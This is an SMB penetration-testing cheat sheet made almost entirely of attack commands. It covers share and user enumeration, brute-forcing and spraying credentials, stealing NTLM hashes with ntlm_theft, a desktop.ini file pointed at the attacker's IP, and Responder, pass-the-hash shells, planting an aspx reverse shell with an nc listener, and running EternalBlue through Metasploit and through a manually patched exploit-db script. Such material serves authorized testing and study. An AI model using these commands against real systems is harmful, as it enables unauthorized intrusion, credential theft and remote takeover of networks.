SMB (Server Message Block) Pentesting

It allows clients, like workstations, to communicate with a server like a share directory. Samba is derived from SMB for linux. Default ports are 139, 445.

Enumeration

To enumerate automatically, we can use various tools such as nmap, smbclient, and so on

nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>
nmap --script smb-enum* -p 445 <target-ip>
nmap --script smb-protocols -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>

# NetBIOS names
nmblookup -A 10.0.0.1
nbtscan 10.0.0.1
nbtscan -r 10.0.0.1/24

# Enum4linux
enum4linux <target-ip>
# All enumeration
enum4linux -a <target-ip>
# Verbose
enum4linux -v <target-ip>
# Specify username and password
enum4linux -u username -p password <target-ip>

# Enum4linux-ng
# -A: All simple enumeration including nmblookup
enum4linux-ng -A <target-ip>
# -As: All simple short enumeration without NetBIOS names lookup
enum4linux-ng -As <target-ip>
# -u: Specific username
# -p: Specific password
enum4linux-ng -u "administrator" -p "password" <target-ip>

# NetExec (https://www.netexec.wiki/)
netexec smb 10.0.0.0/24
netexec smb <target-ip>
netexec smb <target-ip-1> <target-ip-2>
netexec smb <target-ip> -u username -p password
netexec smb <target-ip> -u username -p password --users
# -M zerologon: Scan for ZeroLogon
# -M petitpotam: Scan for PetitPotam
netexec smb <target-ip> -u '' -p '' -M zerologon -M petitpotam
# -M petitpotam: Scan for PetitPotam

Find Shared Folders

# -N: No password
# -L: List shared directories
smbclient -N -L <target-ip>
smbclient -L <target-ip> -U username

smbmap -H <target-ip>
# Recursive
smbmap -H <target-ip> -R
# Username and password
smbmap -u username -p password -H <target-ip>
# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'

netexec smb <target-ip> -u '' -p '' --shares
netexec smb <target-ip> -u username -p password --shares

impacket-psexec example.local/username@<target-ip>

Brute Force Credentials

netexec smb <target-ip> -u username -p passwords.txt --continue-on-success
netexec smb <target-ip> -u usernames.txt -H ntlm_hashes.txt --continue-on-success

hydra -l username -P passwords.txt <target-ip> smb
hydra -L usernames.txt -p password <target-ip> smb

# RID Brute Force
netexec smb <target-ip> -u username -p password --rid-brute 20000

# Using Metasploit
msfconsole
msf> use auxiliary/scanner/smb/smb_login

If we find credentials, we can use them for smbclient or WinRM.
If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.

smbpasswd -r <target-ip> -U <username>
# or
impacket-smbpasswd <DOMAIN>/<username>:<password>@<target-ip> -newpass <new-password>
# If you don't have impacket-smbpasswd, download it from a repository.
wget https://raw.githubusercontent.com/fortra/impacket/master/examples/smbpasswd.py


RID Cycling Attack

RID enumeration.
It attempts to enumerate user accounts through null sessions.

# Anonymous logon
# 20000: Maximum RID to be cycled
impacket-lookupsid example.local/anonymous@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000 -no-pass
impacket-lookupsid example.local/guest@<target-ip> 20000
# Specify user
impacket-lookupsid example.local/user@<target-ip> 20000 -hashes <lmhash>:<nthash>
impacket-lookupsid example.local/user@<target-ip> 20000


# USEFUL COMMAND
# This command extract usernames. It's useful for further enumeration which uses usernames.
# Replace the following keywords:
#  - `example.com` => Target domain
#  - `10.0.0.1`    => Target IP
#  - `DOMAIN`      => Target domain name
impacket-lookupsid example.com/guest@10.0.0.1 20000 -no-pass > tmp.txt | cat tmp.txt | grep SidTypeUser | cut -d ' ' -f 2 | sed 's/DOMAIN\\//g' | sort -u > users.txt && rm tmp.txt


Password Spraying Attack

If we have a user password, we might be able to find another user with the same password.

# User enumeration
netexec smb <target-ip> -u John -p Password123 --users
netexec smb <target-ip> -u John -H <NTLM_HASH> --users

# Find users with same password
netexec smb <target-ip> -u users.txt -p Password123 --continue-on-success
netexec smb <target-ip> -u users.txt -p found_passwords.txt --continue-on-success
netexec smb <target-ip> -u users.txt -H <NTLM_HASH> --continue-on-success
netexec smb <target-ip> -u users.txt -H found_ntlm_hashes.txt --continue-on-success


NTLM Stealing

Using ntlm_theft

# -g all: Generate all files.
# -s: Local IP (attacker IP)
# -f: Folder to store generated files.
python3 ntlm_theft -g all -s <local-ip> -f samples

After generating files with ntlm_theft , put the .lnk file (samples.lnk here) to the shared folder.

smbclient -N //10.0.0.1/example

smb> put samples.lnk

Now start Responder to retrieve the stolen NTLM hashes. Run the following command in our local machine:

sudo responder -I eth0


Connect

You can use smbclient to connect the target.

# anonymous login
smbclient //10.0.0.1/somedir -N
# If the folder name contains spaces, surround with double quotes
smbclient "//10.0.0.1/some dir" -N
# Specify user
smbclient //10.0.0.1/somedir -U username
# nobody, no-pass
smbclient //10.0.0.1/somedir -N -U nobody
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username

To get a Windows shell, run the following examples.

impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1


Commands in SMB

After connecting, we can investigate the shared folder to find sensitive files or information.

List Folders/Files

smb> ls

Download Folders/Files

smb> get sample.txt
# If the filename contains spaces, it need to be enclosed in double-quotes.
smb> get "Example File.txt"

To download files recursively, run the following commands.

smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *

Or using smbget from local machine.
Especially, it’s useful for downloading a large file rather than “get” command in smbclient.

smbget smb://<target-ip>/somedir/example.txt -U username
smbget -R smb://<target-ip>/somedir -U username

# Specify workgroup
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# as anonymous user
smbget smb://<target-ip>/somedir -U anonymous
password: anonymous

Upload Files

# Upload a file
smb> put example.txt

If the website is associated with the SMB server, we can upload reverse shell script such as aspx, php and get a shell.
To create a payload, please refer to the Web Reverse Shell or the Reverse Shell with Metasploit.

Then upload it to the SMB server as below.

smb> put shell.aspx

Don’t forget to start a listener for getting outcoming connection.

nc -lvnp 4444

Now access to https://example.com/path/to/smb/share/shell.aspx.
We can get a shell.

Steal NTLM Hash with Desktop.ini

Reference: https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds#desktop.ini

We can retrieve the hashes by putting desktop.ini file, that contains arbitrary icon resource path, to the shared folder.
Create a new desktop.ini in local machine.

[.ShellClassInfo]
IconResource=\\<local-ip>\test

Then upload it to the writable shared folder.

smb> put desktop.ini

Start responder in local machine.

responder -I tun0

After a while, we can retrieve the NTLM hashes.


EternalBlue (MS17-010)

msfconsole
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> run
# If you cannot get a shell with the default payloed (windows/x64/meterpreter/reverse_tcp), try to change the payload
msf> set payload payload/generic/shell_reverse_tcp

AutoBlue

AutoBlue is an automatic exploit.
Download the repository and run the following example command.

python zzz_exploit.py -target-ip <target-ip> -port 445 'username:password@target'

Manual Exploiting

You need to have two files - exploit.py, mysmb.py

  1. Download mysmb.py

    wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py -O mysmb.py 
    
    # Convert DOS to UNIX
    dos2unix mysmb.py
    
  2. Edit Some Lines of mysmb.py for Python3

    You need to edit some code because this exploit is old so only supports Python2.

    Line.69
    # transData = b''
    transData = ''
    
    Line.73
    # transData = ('\x00' * padLen) + str(parameters)
    transData = "".join(map(chr,(b'\x00' * padLen))) + str(parameters)
    
    Line.80
    # transData += ('\x00' * padLen) + data
    transData += "".join(map(chr,(b'\x00' * padLen))) + str(data)
    
    Line.231
    # req = str(pkt)
    req = pkt.getData()
    return b'\x00'*2 + pack('>H', len(req)) + req  # assume length is <6553
    
    Line.381
    # data += resp['Data'][1:]
    data += resp['Data'][1:].decode()
    
  3. Download exploit.py

    wget -O exploit.py https://www.exploit-db.com/exploits/42315
    
    # Convert DOS to UNIX
    dos2unix exploit.py
    
  4. Edit the Credentials in exploit.py

    ...
    username = "username"
    password = "password"
    ...
    
  5. Run the script

    python exploit.py <target-ip> netlogon
    python exploit.py <target-ip> lsarpc
    python exploit.py <target-ip> samr
    


Launch SMB Server

impacket-smbserver share . -smb2support -username user -password pass

Access from Remote Machine

net use \\<local-ip>\share /u:user pass

Transfer Files

# Remote to Local
cp .\example.txt \\<local-ip>\share\example.txt